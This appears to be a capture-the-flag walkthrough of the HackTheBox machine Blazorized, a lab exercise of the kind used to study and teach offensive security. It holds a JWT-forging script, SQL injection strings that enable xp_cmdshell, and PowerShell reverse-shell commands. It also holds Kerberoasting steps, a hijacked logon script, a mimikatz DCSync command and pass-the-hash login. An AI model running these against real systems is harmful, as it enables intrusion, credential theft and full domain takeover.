HackTheBox - Blazorized

0x1 Initial Access

  • The web application on port 80 is built with Blazor WebAssembly, i.e. the .NET assemblies run client-side and are downloaded by the browser
  • Subdomain enumeration (the -fs 144 filter drops the default vhost response size):
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://blazorized.htb" -H "HOST: FUZZ.blazorized.htb" -c -fs 144
  • Found the subdomains api.blazorized.htb and admin.blazorized.htb
  • admin.blazorized.htb requires credentials to log in
  • For a better understanding of Blazor web apps and their structure, refer to the official documentation on GitHub
  • Found endpoints:
    • /_framework/blazor.webassembly.js: the loader that bootstraps the Blazor app
    • /_framework/wasm/: contains the WebAssembly binaries
  • De-minifying blazor.webassembly.js reveals the path _framework/blazor.boot.json, which lists every assembly (DLL) the application loads together with its integrity hash
  • Look for customised DLLs, i.e. application-specific assemblies among the framework ones:
{
"Blazored.LocalStorage.dll": "sha256-5V8ovY1srbIIz7lzzMhLd3nNJ9LJ6bHoBOnLJahv8Go=",
"Blazorized.DigitalGarden.dll": "sha256-YH2BGBuuUllYRVTLRSM+TxZtmhmNitErmBqq1Xb1fdI=",
"Blazorized.Shared.dll": "sha256-Bz\/iaIKjbUZ4pzYB1LxrExKonhSlVdPH63LsehtJDqY=",
"Blazorized.Helpers.dll": "sha256-ekLzpGbbVEn95uwSU2BGWpjosCK\/fqqQRjGFUW0jAQQ="
}

0x2 DLL Analysis

  • Download the DLLs listed in blazor.boot.json and decompile them with dnSpy
  • Hardcoded JWT signing secret and claim values in Blazorized.Helpers.dll:
private static readonly string jwtSymmetricSecurityKey = "869............d0a";  
private static readonly string superAdminEmailClaimValue = "superadmin@blazorized.htb";
private static readonly string postsPermissionsClaimValue = "Posts_Get_All";
private static readonly string categoriesPermissionsClaimValue = "Categories_Get_All";
private static readonly string superAdminRoleClaimValue = "Super_Admin";
private static readonly string issuer = "http://api.blazorized.htb";
private static readonly string apiAudience = "http://api.blazorized.htb";
private static readonly string adminDashboardAudience = "http://admin.blazorized.htb";
  • Forge a JWT for the super admin on jwt.io: algorithm HS256, signed with the leaked jwtSymmetricSecurityKey; the audience must be the admin dashboard one (http://admin.blazorized.htb), not the API one:
{
  "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
  "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Super_Admin",
  "iss": "http://api.blazorized.htb",
  "aud": "http://admin.blazorized.htb",
  "exp": <expiration_timestamp>
}
  • Store the token in the browser's Local Storage for the admin origin under the key jwt (DevTools → Application → Local Storage → admin.blazorized.htb → jwt)
  • Refresh admin.blazorized.htb; the forged token is accepted and the admin dashboard loads
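To see exactly what the jwt.io step does, here is an added Python example (not code from this writeup or from the Blazorized application) that mints the super-admin token with HS256 from the leaked values and validates it the way a correctly configured ASP.NET TokenValidationParameters would (signature, issuer, audience, expiry). The real key is redacted above, so SECRET here is a placeholder assumption; the claim names, issuer and audiences are the decompiled constants.

```python
import base64
import hashlib
import hmac
import json
import time

# Values from Blazorized.Helpers.dll. The key is redacted on the page, so this
# placeholder is an assumption for the demo, not the real secret.
SECRET = "869............d0a"
ISSUER = "http://api.blazorized.htb"
API_AUD = "http://api.blazorized.htb"
ADMIN_AUD = "http://admin.blazorized.htb"
EMAIL_CLAIM = "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"
ROLE_CLAIM = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"


def b64url(raw: bytes) -> str:
    """JWT uses unpadded base64url for all three segments."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def forge_jwt(secret: str, claims: dict, lifetime: int = 3600) -> str:
    """Sign an arbitrary claim set with HS256 using the symmetric key."""
    header = {"alg": "HS256", "typ": "JWT"}
    payload = dict(claims)
    payload.setdefault("exp", int(time.time()) + lifetime)
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_jwt(secret: str, token: str, audience: str, issuer: str = ISSUER, now=None):
    """Return the payload if the token is valid for this audience, else None.
    This is the check the admin dashboard performs; only the key is wrong here."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        return None
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    payload = json.loads(b64url_decode(p))
    now = int(time.time()) if now is None else now
    if payload.get("iss") != issuer or payload.get("aud") != audience:
        return None
    if payload.get("exp", 0) <= now:
        return None
    return payload


def super_admin_token(secret: str = SECRET, audience: str = ADMIN_AUD) -> str:
    """The exact claim set pasted into jwt.io in the writeup."""
    return forge_jwt(secret, {
        EMAIL_CLAIM: "superadmin@blazorized.htb",
        ROLE_CLAIM: "Super_Admin",
        "iss": ISSUER,
        "aud": audience,
    })


if __name__ == "__main__":
    tok = super_admin_token()
    print(tok)
    print(verify_jwt(SECRET, tok, ADMIN_AUD))
```

The negative checks are the point: the same token is rejected for the API audience, with a different key, or once expired. Audience and expiry are enforced properly by the application; it is the leaked symmetric key, shipped to every browser inside a client-side DLL, that makes the forgery work.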

0x3 Admin Dashboard

  • SQL injection in the admin dashboard (MSSQL backend, stacked queries accepted)
  • Enable xp_cmdshell through the "Check duplicate posts" function:
www'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -
  • Command execution:
www'; exec master..xp_cmdshell 'xxx';-- -
  • Reverse shell (the -enc argument is the base64 of the UTF-16LE-encoded PowerShell script, as generated by revshells.com):
www'; exec master..xp_cmdshell 'powershell -enc <base64 payload>';-- -
  • Shell obtained as NU_1055, the account running the SQL Server service (xp_cmdshell executes in its context)

0x4 NU_1055

  • BloodHound shows that NU_1055 has WriteSPN over the RSA_4810 account
  • This allows targeted Kerberoasting: add an arbitrary SPN to RSA_4810, request a service ticket for it and crack the ticket offline (not SPN-jacking, which is a different, delegation-based attack)
  • Import PowerView
  • Set an SPN on RSA_4810 (it must be unique in the domain):
Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='kitty/kat'}
  • Request a service ticket for it, in hashcat format:
Get-DomainSPNTicket -SPN kitty/kat -OutputFormat Hashcat
  • Save the hash to a file
  • Crack it with hashcat (mode 13100, Kerberos 5 TGS-REP etype 23); afterwards clear the added SPN again so the account is left as found
  • Log in as RSA_4810 with the cracked password using evil-winrm

0x5 RSA_4810

  • From BloodHound, RSA_4810 is a member of the group Remote_Support_Administrators
  • winPEAS reports writable paths; the two Tasks folders below are writable by Authenticated Users on a default Windows install and are not the way forward here:
Folder: C:\windows\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]

Folder: C:\windows\system32\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
  • RSA_4810 has write privileges under the A32FF3AEAA23 directory in SYSVOL, the share that holds logon scripts and Group Policy data
  • The user SSA_6010 logs in every minute
  • SSA_6010's scriptPath attribute points to \\dc1\NETLOGON\A32FF3AEAA23\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030, so logon scripts are stored in the NETLOGON share
  • icacls confirms that RSA_4810 has write access to the batch files there
  • Create a logon script for SSA_6010 that launches a reverse shell (same -e/-enc encoding as in 0x3):
'powershell -e <base64 encoded payload>' | Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\shell.bat -Encoding ASCII
  • Set the scriptPath of SSA_6010 to the new file (the path is relative to the NETLOGON share):
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\shell.bat'
  • Within a minute SSA_6010 logs in, runs the script and we get a shell as SSA_6010

0x6 SSA_6010

  • Running BloodHound again shows that SSA_6010 is a member of the Super_Support_Administrators group
  • The group grants DCSync rights (GetChanges and GetChangesAll on the domain), which let us replicate any account's credentials from the DC
  • Load mimikatz and dump the Administrator account:
lsadump::dcsync /domain:blazorized.htb /user:Administrator
  • This yields the Administrator NTLM hash

0x7 Administrator

  • Log in as Administrator with evil-winrm, passing the extracted NTLM hash (-H) instead of a password